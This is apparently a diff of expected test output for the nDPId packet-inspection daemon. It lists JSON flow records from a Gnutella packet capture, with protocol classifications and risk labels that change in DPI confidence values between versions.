+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-01223{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 